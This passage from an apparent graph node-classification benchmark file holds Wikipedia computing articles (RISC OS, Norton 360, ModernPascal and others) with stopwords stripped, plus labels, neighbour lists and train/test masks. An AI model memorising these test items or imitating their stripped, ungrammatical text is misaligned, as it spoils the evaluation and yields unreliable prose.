original os/360 sort/merge program 360s-sm-023 program name ierrco00 alias sort supported ibm first-generation direct-access storage devices dasd tapes 2400 support second-generation disk drives provided ibm program products 5734-sm1 later 5740-sm1 dfsort alias iceman also sort sort frequently executed stand-alone program normally reads input file identified dd codice_12 writes sorted output file identified dd codice_13 also often called another application via cobol codice_14 verb calls pl/i codice_15 routines may use either codice_12 codice_13 files passed records sorted caller and/or pass sorted records back caller one time operation sort directed control statements largely compatible among various ibm third-party sort programs codice_14 codice_19 statement defines sort keys — fields data sorted merged statement identifies position length data type key codice_20 statement describes format length records input file statements allow user specify records included excluded sort specify transformations performed data keys combination ebcdic ascii character data zoned packed-decimal signed unsigned fixed-point binary hexadecimal floating-point keys located anywhere record contiguous sorting specified combination ascending descending sequence key os/360 sort program ierrco00 operates dividing input data sections sorting section main memory writing sorted section intermediate datasets either direct-access storage devices dasd magnetic tape final merge phases merge sections produce sorted output sort uses one number techniques distributing sections among secondary storage devices usually sort choose optimal technique overridden user sort three techniques used intermediate storage tape two disk tape techniques disk techniques os/360 linkage editor available several configurations dfsmsdfp added binder alternatives load modules option program objects linkage editor creates replaces load modules partitioned data set combination control cards object modules load modules rename replace control section csect perform several miscellaneous functions originally available several configurations depending storage requirement e level linkage editor longer available f level linkage editor known simply linkage editor z/os linkage editor present compatibility binder performs functions linkage editor addition supports new format program object functional equivalent load module partitioned data set extended pdse many additional capabilities programming language used computer shop one associated compilers translate source program machine-language object module object module compiler must processed linkage editor iewl create executable load module igycrctl common example compiler compiler current ibm enterprise cobol z/os product several previous ibm cobol compilers years different names many compilers various programming languages assembler e intended os/360 running small machines assembler f intended normal os/360 installations assembler xf system assembler os/vs1 os/vs2 replacing assembler e f although fully compatible ibm soon made assembler xf system assembler dos vm well assembler h assembler h version 2 program product assemblers generally faster assemblers e f xf although fully compatible ibm high level assembler hlasm essentially new version assembler h version 2 assembler ibm supports z/os z/vm replaces older assemblers although fully compatible system modification program smp vehicle installing service os/360 successors replacing e.g. stand-alone assembly link edit imaptfle jobs originally optional facility mandatory mvs/sp later program product version smp/e included recent systems e.g. z/os",
    "neighbors": [
      10883,
      7,
      909,
      7053,
      8213,
      1952,
      8737,
      4645,
      9639,
      1323,
      7217,
      8502,
      1219,
      6342,
      8262,
      7881,
      8393,
      8272,
      477,
      868,
      6503,
      9838,
      3443,
      2168
    ],
    "mask": "Train"
  },
  {
    "node_id": 9978,
    "label": 2,
    "text": "History_of_RISC_OS:history risc os risc os computer operating system developed acorn computers arm-based acorn archimedes range originally released 1987 soon followed next version became completed made available april 1989 released earliest version a5000 1991 contained series new features 1996 risc os shipped 500,000 systems. released riscos ltd rol july 1999 based continued development rol march 1999 licensed rights risc os element 14 renamed acorn eventually new owner pace micro technology according company 6,400 copies rom sold production ceased mid-2005. launched may 2001 rol subscription scheme allowing users access latest os updates upgrades released soft-loadable rom images separate rom boot os stored loaded boot time shipped may 2002 following november 2002 final release june 2004 rol released rom based month dubbed play risc os gui convention calling three mouse buttons 'select 'menu 'adjust rol sold 500th adjust rom early 2006. released october 2002 castle technology acorn clone iyonix pc separate evolution based upon ncos work done pace set-top boxes october 2006 castle announced source sharing license plan elements shared source initiative ssi managed risc os open ltd rool risc os 5 since released fully free open source apache 2.0 license older longer maintained risc os 6 older not. also announced october 2006 rol next generation stream operating system first product launched name continuation select scheme beta-version available 2007 free download subscribers select scheme april 2009 final release shipped latest release risc os rol shipped december 2009 os designed united kingdom acorn 32-bit arm based acorn archimedes released first version 1987 arthur operating system first public release os arthur 1.20 june 1987 bundled desktop graphical user interface gui mostly comprises assembly language software modules desktop module written features colour-scheme typically described technicolour graphical desktop runs top command-line driven operating system owes much acorn earlier mos operating system bbc micro range 8-bit microcomputers arthur originally conceived intended deliver similar functionality operating system bbc master series computers mos reaction fact advanced operating system research project arx would ready time archimedes arthur project team led paul fellows given five months develop entirely ground up—with directive make like bbc micro intended stop-gap operating system acorn development arx could completed however latter delayed time eventually dropped became apparent arthur development could extended window manager full desktop environment also small enough run first 512k machines floppy disc whereas arx required 4 megabytes hard drive os development carried using prototype arm-based system connected bbc computer moving onto prototype acorn archimedes a500 arthur multitasking operating system offered support adding application-level cooperative multitasking version operating system released externally internally development desktop window management continued addition cooperative multitasking system invented neil raine used memory management hardware swap-out one task bring another call-and-return wimp-poll call applications obliged make get messages desktop transformed single-application-at-a-time system one could operate full multi-tasking desktop transformation took place version 1.6 though made public released name change arthur risc os version 2.0 software made arthur 1.2 run risc os 2 later underneath desktop original arthur os core api interfaces modular structures remain heart versions titles work however used undocumented features side effects cases apis became deprecated 2011 business insider listed arthur one ten operating systems time forgot next version became completed made available april 1989 risc os rapid development arthur 1.2 failure arx project first release called arthur 2 renamed risc os 2 first sold risc os 2.00 april 1989 operating system implements co-operative multitasking limitations multi-threaded uses adfs file system floppy hard disc access initially ran 512 kb set roms wimp interface offers standard features fixes many bugs hindered arthur lacks virtual memory extensive memory protection applications protected many functions implemented 'modules full access memory time release main advantage os rom booted quickly easy crash impossible permanently break os software high performance due much system written arm assembly language os designed users mind rather os designers organised relatively small kernel defines standard software interface extension modules required conform much system functionality implemented modules coded rom though supplanted evolved versions loaded ram among kernel facilities general mechanism named callback handler allows supervisor module perform process multiplexing facility used module forming part standard editor program provide terminal emulator window console applications approach made possible advanced users implement modules giving risc os ability pre-emptive multitasking slightly updated version risc os 2.01 released later support arm3 processor shipped acorn archimedes a540 acorn r225/r260 introduced number new features including multitasking filer operations applications fonts rom limit number open windows ability move windows screen safe shutdown pinboard arm3 support grouping icon bar icons 128 tasks ability read ms-dos format discs use named hard discs improved configuration also included way multiple windows change settings risc os 3.00 released earliest version a5000 1991 almost four times size risc os 2 runs 2 mb rom improves multitasking also places popular base applications rom risc os 3.00 several bugs replaced risc os 3.1 months later upgraded roms supplied cost postage risc os 3.1 released later sold built a3010 a3020 a4000 a4 later a5000 models also made available replacement roms a5000 earlier archimedes machines last risc os version suitable machines three variants released risc os 3.10 base version risc os 3.11 included slight update fixes serial port issues risc os 3.19 german translation risc os 3.50 sold 1994 first risc pcs due different hardware architecture risc pc including arm 6 processor 16- 24-bit colour different io chip iomd risc os 3.50 made available older archimedes series arm2 3 machines risc os 3.5 somewhat shoehorned 2 mb footprint moved rom applications risc os 3.1 onto hard drive proved unpopular later moved back rom version introduced issues backward compatibility particularly games risc os 3.60 followed 1995 os features much improved hard disk access networking enhanced include tcp/ip standard addition acorn existing proprietary econet system hardware support also improved risc pcs could use arm7 processors acorn a7000 machine arm7500 processor also supported risc os 3.6 twice size risc os 3.5 shipping 4 mb two rom chips risc os 3.70 released 1996 primary changes os support strongarm processor made available upgrade risc pc required extensive code changes due strongarm split data instruction cache harvard architecture 32-bit interrupt modes risc os 3.71 small update released support hardware acorn a7000+ arm7500fe processor fe offered hardware support floating point mathematics usually emulated one risc os software modules risc os 3.60 also formed foundation ncos shipped acorn netchannel ncs acorn officially halted work areas except set-top boxes january 1999 company renamed element 14 14th element periodic table silicon new goal become purely silicon design business like previous successful spin arm acorn 1990 risc os development halted development os 4.0 riscpc 2 phoebe 2100 whose completion also cancelled beta version os 3.8 ursula original riscpc previously released developers project code names phoebe hardware ursula software chandler graphics processor chip taken names characters tv series friends phoebe ursula twin sisters series led number rescue efforts try keep acorn desktop computer business alive acorn held discussions many interested parties eventually agreed exclusively licence risc os riscos ltd formed consortium dealers developers end-users pace purchased rights use develop ncos also number projects bring advantages risc operating system platforms creation rox desktop provide risc os-like interface unix linux systems separate work pace resulted code fork continued subsequent licensing agreement castle technology causing much community debate time debate remains ongoing 2011 march 1999 new company called riscos ltd founded licensed rights risc os element 14 eventually new owner pace micro technology continued development os 3.8 releasing risc os 4 july 1999 whilst hardware support phoebe needed core improvements risc os 3.80 could finished released included according company 6,400 copies risc os 4.02 rom sold production ceased mid-2005 1999 2000 riscos ltd also released versions risc os 4 support several additional hardware platforms microdigital mico microdigital omega riscstation r7500 castle kinetic riscpc 2003 version risc os 4 released support millipede graphics alphalock podule risc os 4 also available various hardware emulators operating systems september 2003 virtualacorn released commercial emulator virtualrpc included copy risc os 4.02 december 2008 riscos ltd made 4.02 available non-commercial emulators £5 product called virtually free may 2001 company launched risc os select subscription scheme allowing users access latest os updates upgrades released soft-loadable rom images separate rom boot os stored loaded boot time providing soft-loads physical rom costs eliminated updates able delivered accelerated speed frequency also allowed company subsidise retail price rom releases generally culmination last select upgrades extra minor changes may 2002 final release select 1 shipped included november 2002 final release select 2 shipped included june 2004 final release select 3 shipped included also june 2004 riscos ltd released rom based version 4.39 dubbed risc os adjust name play risc os gui convention calling three mouse buttons 'select 'menu 'adjust riscos ltd sold 500th adjust rom early 2006 features introduced 4.39 include user customization graphical user interface release select scheme made risc os six branding mentioned a9home released 2006 uses version 4.42 adjust 32 developed supports 32-bit addressing modes found later arm architectures october 2006 shortly castle technology announced shared source initiative riscos ltd announced risc os six next generation stream operating system first product launched risc os six name continuation select scheme select 4 beta-version risc os 6 preview 1 select 4i1 available 2007 free download subscribers select scheme present subscribers whose subscription renewed 30 may 2004 since lapsed risc os six brought portability stability internal structure improvements including full 26/32-bit neutrality highly modularised legacy hardware specific features abstracted code separated easier future maintenance development teletext support device interrupt handler software-based graphics operations real-time clock mouse pointer cmos ram support hardware timer support abstracted kernel separate modules legacy components like vidc driver obsolete functionality bbc micro abstracted aif transient utility executable checking introduced also protect rogue software graphics acceleration modules may provided sm501 graphics chip a9home viewfinder agp podule cards april 2008 final release select 4 shipped included select 4 releases initially compatible acorn risc pc a7000 machines riscstation r7500 microdigital omega mico computers officially supported company test machines available requires proprietary software code rights lack detailed technical information microdigital omega also cited another reason support hardware difficult april 2009 final release select 5 shipped included final release risc os riscos ltd select 6i1 shipped december 2009 includes risc os 5 separate evolution castle technology ltd based upon work done pace ncos based set top boxes risc os 5 written support castle iyonix pc acorn-compatible runs intel xscale arm processor although wealth software updated older applications run risc os 5 via emulator called aemulor since armv5 xscale processor support 26-bit addressing modes likewise risc os 5 ported run properly new cpu abstraction graphics hardware interfaces created allow example use standard graphics cards instead acorn vidc chip july 2003 castle technology ltd bought head licence risc os pace micro october 2006 castle technology ltd announced plan release elements risc os 5 source sharing license shared source initiative ssi joint venture castle risc os open limited rool newly formed software development company aims accelerate development encourage uptake os custom dual license released source freely available may modified redistributed without royalty non-commercial use commercial usage incur per-unit license fee castle ssi made phased releases source code starting may 2007 october 2008 enough source released build almost complete iyonix rom image late 2011 possible build complete rom images published sources full source code available tarballs cvs web interface cvs archive addition prebuilt images available stable releases development nightly builds rool maintains shared source tree builds international developer community non-profit basis support encourage development rool castle intend provide risc os consultancy clients requiring embedded arm solutions already major market os ports risc os 5 available a7000/a7000+ riscpc rpcemu omap3 beagleboard derivatives omap4 pandaboard pandaboard es am5728 titanium raspberry pi xscale iyonix october 2018 risc os 5 re-licensed apache 2.0 license",
    "neighbors": [
      1668,
      3722,
      2574,
      11539,
      3350,
      38,
      10029,
      7983,
      11184,
      10548,
      823,
      1849,
      4679,
      1741,
      9166,
      9044,
      477,
      1501,
      1377,
      8551,
      9964,
      8429,
      10862,
      5492,
      1790
    ],
    "mask": "None"
  },
  {
    "node_id": 9979,
    "label": 2,
    "text": "Developer_Certificate_of_Origin:developer certificate origin developer certificate origin dco introduced 2004 linux foundation enhance submission process software used linux kernel shortly sco–linux disputes dcos often used alternative contributor license agreement cla instead signed legal contract dco affirmation source code submitted originated developer developer permission submit code proponents dco content reduces barriers entry introduced cla",
    "neighbors": [
      4011,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9980,
    "label": 5,
    "text": "ARP_cache:arp cache arp cache collection address resolution protocol entries mostly dynamic created ip address resolved mac address computer effectively communicate ip address arp cache disadvantage potentially used hackers cyber attackers arp cache helps attackers hide behind fake ip address beyond fact arp caches may help attackers may also prevent attacks distinguish ing low level ip ip based vulnerabilities",
    "neighbors": [
      5437
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9981,
    "label": 9,
    "text": "ModernPascal:modernpascal modern pascal closed source cross-platform interpreter compiler runtime environment command line server-side networking applications modern pascal applications written pascal/object pascal run within modern pascal runtime microsoft windows linux os x freebsd solaris dos/32 operating systems work hosted supported 3f llc partner mp solutions llc modern pascal provides blocking i/o api technology commonly used operating system applications modern pascal coderunner contains built-in library allow applications act web server without software apache http server iis modern pascal invented 2000 ozz nixon also co-developing dxjavascript alexander baronovski ozz inspired kylix project 1999 met borland pascal team shared programming language modern pascal ozz ported commercial socket suite dxsock kylix started developing modern pascal run pascal scripts microsoft windows linux os x 2002 version 1.1 released modern pascal v1.1 capable running turbo pascal dos syntax last version using variants internally variable code instances version 1.1 introduced support built-in rtl units allowing developers extend language grammar support crt/display tcp/ip socket calls 2005 version 1.2 released modern pascal v1.2 available 64bit platforms native 64bit binaries internal support 64bit numbers memory addresses 2007 version 1.3 released modern pascal v1.3 added cross-platform support dynamic libraries .so .dylib .dll first version capable developing native windows gui applications along linux qt gui applications supporting external libraries language longer limited command line web server script engine role 2008 version 1.4 released modern pascal v1.4 fork internally called declan decisioning language use credit financial industry version 1.4 also introduced tdataset compatibility borland delphi compiler along ability connect databases via built-in odbc support allows modern pascal leverage almost sql database engines command line web solutions 2009 version 1.5 released modern pascal v1.5 redesign parser phase lexicon first version modern pascal started incorporate syntax popular languages like += -= *- /= c/javascript version 1.5 available native apache module windows linux os x 2010 version 1.6 released modern pascal v1.6 incorporates built-in rtl units ciphers compressions hashs version truly focused migrating applications web needed built support common ciphers hashes compression algorithms used restful applications 2011 version 1.7 released modern pascal v1.7 redesign apache module release forward modern pascal longer built apache module modern pascal celerity introduced inspired design coldfusion ntier back end web servers means future release fastcgi isapi even old cgi nsapi interfaces could deployed version 1.7 also introduced old pascal 3.0 feature called chaining slightly modern style 2013 version 1.8 released modern pascal v1.8 introduced support delphi-like classes smart records unions self instantiation version 1.8 first version modern pascal started truly become pascal dialect 2014 version 1.9 built released public modern pascal v1.9 used develop developip large scale public web site 2015 version 2.0 begun modern pascal 2.0 fork lape previous versions fast efficient fast enough larger customers current benchmarks show v2.0 processing 100 million instructions second roughly 8 times faster version 1.9 much faster alternative pascal script engines july 2015 modern pascal 2.0 enters final private beta cycle team actively porting code snippets old applications 2.0 publishing code github 2017 version 2.0 released public includes native dbase iii+ iv v vii clipper foxpro support past 24 months development 3f ported github source 17 bbses including quickbbs tpboard hermes binkp fidonet protocol multiple tossers adventure game studio 1984 custom micro solutions inc. accounting point sale software web ria applications 3f also introduced transparent support extended ascii ansi utf8 graphics modern pascal command line interface allows create run dos like applications using pascal decades free pascal source code implement run wide range business classes command utilities modern pascal celerity allows create similar solutions stand-alone middleware backend engine combined apache module celerity used create wide range web script solutions modern pascal coderunner allows create standalone networking tools including web servers email servers chat servers coderunner manages tcp communications code even tls/ssl developer simply focus happens connection established program game.loot.example uses math const maxprobability=1000 type function looter.choose loottype var begin end function looter.asstring l loottype string begin end procedure looter.free begin end // must listed implementation // procedure looter.init begin end var begin end output replaced original code sample something easier read/follow run turbo pascal syntax hello world program modernpascal coded normal pascal hello world program helloworld begin end modernpascal also supports brief pascal execute statements without formality writeln 'hello world pascal speak reusable collection methods referred unit languages often call modules libraries modern pascal built-in units handle display environment calls like file system i/o sockets networking tcp binary data buffers classes objects cryptography functions data streams regular expression collections logging configuration files using ini csv sdf similar csv formats databases odbc built-in dbase clipper foxpro core functions modern pascal operates without requiring third-party libraries modern pascal optionally require openssl achieve tls/ssl listeners clients modern pascal operates using single thread model using blocking i/o calls celerity coderunner self-threading engines allowing modern pascal support tens thousands concurrent connections design single thread instance code means used build highly reliable applications design goal modern pascal application skill level programmer able operate without fear memory leak variable collision threads etc approach allows scaling number cpu cores machine running negative approach increase thread switching contexts however modern pascal tested base dell laptop handling 50,000 concurrent connections/scripts",
    "neighbors": [
      1952,
      225,
      865,
      5154,
      9762,
      10506,
      5612,
      6797,
      8524,
      7983,
      10924,
      9714,
      9780,
      3413,
      11221,
      823,
      4439,
      5663
    ],
    "mask": "Train"
  },
  {
    "node_id": 9982,
    "label": 8,
    "text": "Masterseek:masterseek masterseek corp. b2b business-to-business search engine founded denmark 1999 masterseek encompasses 175 million business profiles 346 million websites 450 million contacts 216 million linkedin members thus making masterseek largest commercial database world masterseek founded denmark rasmus refer 1999 denmark headquarters located bredgade 29 dk-1260 kbh k also current headquarters new york city 82 wall street according executives masterseek utilizes business model based annual business subscription fee usd 149 return subscribers receive full editing control corporate profile content advertising control widgets embedded video among factors june 2008 accountancy firm horwart international approximated raw market value masterseek company 150 million company remains privately owned also june 2008 sold 10 authorized stocks range foreign investors company announced january 31 2009 company offering limited number shares sale order raise 4–6 million order gain listing swedish marketplace aktietorget founder refer also announced plans ipo october 2009 signed swedish-based company thenberg kinde fondkommission ab financing july 11 2016 masterseek announced company planning getting listed nasdaq listing nasdaq provide capital expansion rapidly growing markets latin america africa asia doney law firm assisting listing nasdaq capital market june 2008 company stated 50 million company profiles 75 countries handled 90,000 b2b searches daily company stated 82 million profiles march 21 2011 average 300,000 new profiles added monthly 2017 company stated 178 million company profiles october 30 2008 announced masterseek acquired b2b search engine accoona search engine fairly successful united states china exclusive partnership china daily august 3 2006 time dubbed accoona one 50 best websites illustrating search engine used artificial intelligence understand meaning keyword queries accoona run difficulties gone defunct early october 2008 withdrawing ipo making possible masterseek acquire data technology masterseek bought remaining search engine codes domain name assets accoona integrated masterseek re-launched usa china launched europe january 2009 accoona information also integrated masterseek search engine masterseek search engine relies web crawlers automatically collect sort company details internet searches look company profiles contact information descriptions products services searches global national regional involved local markets hits listed relevance according search terms different search options including specific product search company searches people searches results displayed languages search engine also offers masterrank point system ranking corporate websites july 5 2007 masterseek announced cosponsors team csc denmark cycling team beginning team involvement tour de france masterseek name began displayed team apparel week tour start london global investor alerts issued public warning alerting masterseek corp. cold-calling potential customers offering unauthorised illegal financial services also multiple reports masterseek engine crawling profiles individuals illegally violating privacy fair use policies services like linkedin create publicly publish profiles individuals without consent providing control editing profiles owners profiles thus violating civil criminal laws multiple jurisdictions around world",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 9983,
    "label": 4,
    "text": "Norton_360:norton 360 norton 360 developed symantec “ all-in-one ” security suite combined online protection performance tuning thing distinguished suite norton internet security inclusion optimization problem-solving tools norton 360 distributed boxed copy download preinstalled computers oem software norton 360 discontinued cut overhauled norton line mid-2014 features carried successor norton security symantec announced project genesis february 7 2006 genesis would differ symantec consumer security products incorporating file backup performance optimization tools antivirus capabilities firewall phishing protection real-time heuristics also planned windows vista compatibility major aspect genesis genesis slated release september may 2005 microsoft announced windows live onecare security suite similar functionalities slated release 2006 genesis renamed norton 360 may 31 2006 feature set confirmed—it would functionalities norton internet security—with file backup performance tools phishing protection real-time heuristics public beta test planned summer 2006 final release date set end 2006 day mcafee announced falcon security suite similar functionalities norton 360 onecare however dates delayed onecare launched summer 2006 falcon entered public beta testing viewed norton 360 response microsoft antivirus software onecare however release onecare saw symantec lagging behind rivals mark bregman symantec vice president claimed upcoming norton 360 intended compete onecare stating somehow left wrong impression market place windows live onecare microsoft falcon mcafee nothing symantec first public beta delivered november 2006 compatible windows xp second beta subsequently released december 20 2006 adding compatibility windows vista build 6000 100,000 people tested software symantec began distribution retailers february 2007 version 1.0 released february 26 2007 version first symantec product use sonar detect zero-day viruses monitors applications malicious behavior taking action needed backup restore functionality allowed users back files online hard drive cd dvd performance optimization tools allowed users clear web browser history temporary files disk defragmenter bundled part optimization tools phishing protection integrates internet explorer warning users fraudulent sites windows xp 300 megahertz processor 256 megabytes ram 300 mb hard disk space required vista 800 mhz processor 512 mb ram 300 mb hard disk space required reviews cited norton 360 low resource usage relative norton internet security 2007 phishing protection pc magazine found phishing protection feature effective blocking access fraudulent sites internet explorer 7 firefox 2 however reviewers highlighted lack manual control advanced users cnet noted lack phishing protection browsers internet explorer mozilla firefox cnet also highlighted lack wireless network tools notifying users someone uninvited joins network help encrypting wireless signals pc magazine criticized antispam filter version 1.0 finding blocked half spam mail five percent false positive rate version 2.0 released march 3 2008 backup feature inscribe data blu-ray hd dvd discs multiple installations norton 360 also managed centralized location backing files online user control amount bandwidth norton uses registry cleaner bundled performance tools allowing user remove invalid entries phishing protection firefox added supplementing phishing protection norton identity safe stores login credentials websites network map allows users view status norton installations networked computers view basic information computer system requirements remain version 1.0 pc magazine found spam filter inaccurate 25 percent false positive rate cnet encountered problems installing version 2.0 legacy machines version 3.0 released march 4 2009 version uses codebase norton internet security 2009 earlier versions symantec rewrote code specifically norton 360 version 3.0 incorporates norton safe web offered standalone service earlier safe web integrates firefox internet explorer toolbar blocking access fraudulent malware hosting sites toolbar also includes search box routing search queries typed box ask.com search engine toolbar share code ask.com toolbar classified spyware mcafee trend micro antivirus vendors due criticism search functionality symantec announced ask.com search box would hidden future releases version 3.0 capability back files flash drive introduced release files stored flash drive copied another computer without norton 360 installed norton also creates virtual drive windows explorer allowing users browse backup files stored locally online users restore individual files using drag-and-drop technique version 3.0 retain previous versions files skips files open another program startup application manager included release allowing users control programs start login complement application manager norton measure impact programs login time pc magazine highlighted version 3.0 inaccurate spam filter misfiling half valid mail spam pc magazine also noted support session symantec technician used shareware application malwarebytes anti-malware remove malware computer referring online norton program controversy raised fact technician misleadingly referred program symantec product version 4.0 released february 17 2010 version adds many new security features found norton internet security 2010 version 4 also features gui change prominent colors match gold black sunburst norton internet security widely criticized antispam replaced far effective brightmail according symantec gives 20 better results require training version 5.0 released february 2011 offers improved performance virus detection also provides updated versions sonar version 3 system insight download insight supports internet explorer firefox browsers also supports following clients qq chat msn messenger chat limewire p2p msn explorer browser e-mail chat opera browser outlook e-mail thunderbird e-mail windows mail e-mail chrome browser bittorrent p2p aol browser yahoo messenger chat safari browser filezilla file manager outlook express e-mail features new enhanced interface realistic icons animations also includes norton widgets platform integrates symantec online services directly ui also new version reputation scan gives user clear insight loaded applications files safeweb facebook scans links wall verify safety links norton recovery tools added scanner interface start menu folder help restoring highly infected system backup restore functionality also improved passmark performance test 011 rated norton 360 5.0 fastest lightest all-in-one suite featured metered broadband modes easily remembers logins personal info protecting online identity theft version norton released september 5 2012 together newest norton antivirus norton internet security products described version-less symantec press release alluding automatic updates always keep software latest version specific version reference anywhere description software software compatible windows 8 version norton 360 features enhancements social networking protection anti-scam capabilities stronger networking defenses norton also introduced extra tune disk optimizer version 21 norton security suite released september 4 2013 together newest norton antivirus norton internet security products norton 360 antivirus solution developed sonar technology claims able detect threat block remove thanks three five layers shields threat monitoring threat removal network defense last one dealing online threats actually reach user ’ computer protection also granted analyzing behavior known menaces another important aspect derives stealth capabilities five shields work silently background performing scans updates back-ups automatically need whatsoever care important files browser protection download insight keen eye dangerous applications warning user eventual threats running computer version 22 released september 22 2014 release marketed norton security 2015 however norton 360 users able update v22 even norton retiring norton 360 brand appearance software identical norton security 2015 except product name top-left corner april 2019 symantec released new norton 360 emphasis new old legacy norton 360 remains retired product new norton 360 step norton security basically got replaced new product main change reflects besides security protection norton 360 provides secure vpn online privacy dark web monitoring powered lifelock safecam help block pc webcam takeovers new norton 360 comes several editions two standalone three bundle lifelock options norton 360 available norton 360 standard norton 360 premier edition norton 360 multi-device premier edition functions standard edition difference comes 25 gb online storage versus 2 gb included standard edition norton 360 multi-device actually three products one subscription norton 360 premier edition norton internet security mac® norton mobile security comparison norton 360 editions norton one shows features os coverage norton 360- gold edition credit card type 5 unique sets alpha-numeric key data reverse sold instructions go online install installation page norton 360 software sold purchased subscription stated period e.g one year software e.g firewall antivirus automatically disabled end subscription period unless new subscription purchased special edition norton 360 premier edition branded norton security suite available free pc customers comcast xfinity internet service difference norton 360 premier edition norton security suite latter include online storage feature norton internet security mac also available free comcast xfinity customers major version updates norton security suite typically occur 1 month norton 360 windows 8 consumer preview released february 29 2012 symantec announced norton antivirus internet security well newest norton 360 version 6 compatible windows 8 symantec compliance fbi whitelisted magic lantern keylogger developed fbi purpose magic lantern obtain passwords encrypted e-mail part criminal investigation magic lantern first reported media bob sullivan msnbc november 20 2001 ted bridis associated press magic lantern deployed e-mail attachment attachment opened trojan horse installed suspect computer trojan horse activated suspect uses pgp encryption often used increase security sent e-mail messages activated trojan horse log pgp password allows fbi decrypt user communications symantec major antivirus vendors whitelisted magic lantern rendering antivirus products including norton internet security incapable detecting magic lantern concerns include uncertainties magic lantern full potential whether hackers could subvert purposes outside jurisdiction law graham cluley technology consultant sophos said way knowing written fbi even ’ know whether used fbi commandeered third party another reaction came marc maiffret chief technical officer cofounder eeye digital security customers paying us service protect forms malicious code us law enforcement job make exceptions law enforcement malware tools fbi spokesman paul bresson response magic lantern needed court order deploy like technology projects tools deployed fbi would used pursuant appropriate legal process proponents magic lantern argue technology would allow law enforcement efficiently quickly decrypt messages protected encryption schemes implementing magic lantern require physical access suspect computer unlike carnivore predecessor magic lantern since physical access computer would require court order norton internet security windows versions criticized uninstalling completely leaving unnecessary files registry entries versions prior 3.0 also installed separate liveupdate program updates norton-branded software user must uninstall norton internet security liveupdate component manually liveupdate component purposely left behind update norton-branded products present symantec developed norton removal tool remove registry keys values along files folders uninstaller must run twice initially computer restart requiring second restart uninstallation remove subscription data preserved prevent users installing multiple trial copies norton 360 version 2.0 installed users encountered incompatibilities upgrading windows xp service pack 3 windows vista service pack 1 users report numerous invalid windows registry keys added tool named fixcss.exe resulting empty device manager missing devices wireless network adapters symantec initially blamed microsoft incompatibilities since accepted partial responsibility dave cole senior director product management acknowledged users running norton products experiencing problems said numbers small cole also said symantec done extensive testing products windows xp sp3 issue encountered cole blamed microsoft related xp sp3 microsoft recommended users contact windows customer support resolve problem symantec issued fix intended users upgrading symantec also recommends disabling tamper protection component 2008 release dubbed symprotect tool remove added registry entries available symantec sarah hicks symantec vice president consumer product management voiced concern windows vista 64-bit patchguard feature patchguard designed microsoft ensure integrity kernel part operating system interacts hardware rootkits may hide operating system kernel complicating removal mike dalton european president mcafee said decision build wall around kernel assumption ca n't breached ridiculous claiming microsoft preventing security vendors effectively protecting kernel promoting security product windows live onecare hicks said symantec mind competition onecare symantec later published white paper detailing patchguard instructions obtain patchguard exploit negotiations investigations antitrust regulators microsoft decided allow security vendors access kernel creating special api instructions norton 360 comes one-year subscription activated upon installation valid three home computers expiration subscription blocks access program updates shuts antivirus firewall well tools bundled password manager user saved passwords also inaccessible users often understand completely exposed pcs become infected viruses",
    "neighbors": [
      2049,
      2563,
      10756,
      9757,
      550,
      10790,
      1581,
      8753,
      569,
      5178,
      9279,
      9791,
      2118,
      3163,
      8283,
      8816,
      4722,
      10872,
      127,
      6797,
      1172,
      10903,
      10392,
      6297,
      2213,
      3243,
      1708,
      8368,
      10935,
      704,
      10433,
      4814,
      8398,
      9423,
      10451,
      6364,
      5860,
      10987,
      8943,
      9971,
      1273,
      1792,
      5380,
      8978,
      7955,
      4374,
      9496,
      6431,
      10531,
      5924,
      8998,
      3885,
      7983,
      2870,
      823,
      11065,
      11577,
      9025,
      1858,
      11073,
      2378,
      1358,
      2383,
      10574,
      9048,
      4953,
      2907,
      9055,
      9569,
      3941,
      3942,
      3944,
      8572,
      4480,
      5512,
      6028,
      3482,
      1436,
      4511,
      4005,
      8115,
      3520,
      5057,
      7121,
      10708,
      4568,
      6643
    ],
    "mask": "Train"
  },
  {
    "node_id": 9984,
    "label": 7,
    "text": "GridPP:gridpp gridpp collaboration particle physicists computer scientists united kingdom cern manage maintain distributed computing grid across uk primary aim providing resources particle physicists working large hadron collider experiments cern funded uk science technology facilities council collaboration oversees major computing facility called tier1 rutherford appleton laboratory ral along four tier 2 organisations scotgrid northgrid southgrid londongrid formerly lt2 tier 2s geographically distributed composed computing clusters multiple institutes 2012 gridpp infrastructure spans 18 uk institutions major partner uk national grid initiative part european grid infrastructure original gridpp plan drawn late 2000 provide uk contribution lhc computing grid europeandatagrid project european grid infrastructure drive behind projects provide researchers working lhc experiments suitable computing resources extend use technology communities first gridpp proposal accepted pparc time uk funding council responsible funding particle physics related projects collaboration officially began 1 september 2001 £17m funding first phase gridpp 2001 2004 collaboration built uk testbed working prototype grid linked similar systems around world preparation use production infrastructure analysed real data wide variety experiments run around world different institutions 2004 extended till september 2007 bring proposed lhc switch date 2007 gridpp fully functioning production service lhc switch still year away september 2007 received extension stfc receiving £30m funding march 2011 gridpp fourth phase 2011–2014 received funding science technology facilities council stfc support lhc experiments users late 2011 project providing 29,000 cpus 25,000tb storage worldwide grid infrastructure uk universities institutions researchers working lhc members 2011 list follows scotgrid based across 3 main sites primarily supports on-going research within field particle physics entire environment monitored maintained developed dedicated teams site ensure fully operational system available end user communities londongrid joint collaboration 5 institutes london region provide high performance computing resources high energy physics community gridpp supports many disciplines projects list different experiments projects actively use gridpp resources gridpp originally created support experiments based cern using lhc 4 main experiments supported alongside experiments lhc gridpp also supports international high energy physics experiments include gridpp european grid infrastructure efforts supports many non-physics research disciplines",
    "neighbors": [
      1776,
      10116,
      5956,
      1862
    ],
    "mask": "Test"
  },
  {
    "node_id": 9985,
    "label": 2,
    "text": "NCR_VRX:ncr vrx vrx acronym virtual resource executive proprietary operating system ncr criterion series later v-8000 series mainframe computers manufactured ncr corporation 1970s 1980s replaced b3 operating system originally distributed century series inherited many features b4 operating system high-end ncr century series computers vrx upgraded late 1980s 1990s become vrx/e use ncr 9800 series computers edward d. scott managed development team 150 software engineers developed vrx tom tang director engineering ncr responsible development entire criterion family computers product line achieved 1b revenue 300m profits ncr",
    "neighbors": [
      10065,
      2179,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9986,
    "label": 5,
    "text": "GNUMail:gnumail gnumail free open-source cross-platform e-mail client based gnustep cocoa official mail client gnustep also used étoilé inspired nextmail next mail.app predecessor apple mail gnumail based mail handling framework pantomime furthermore gnumail demonstrates possible develop cross platform programs gnustep cocoa",
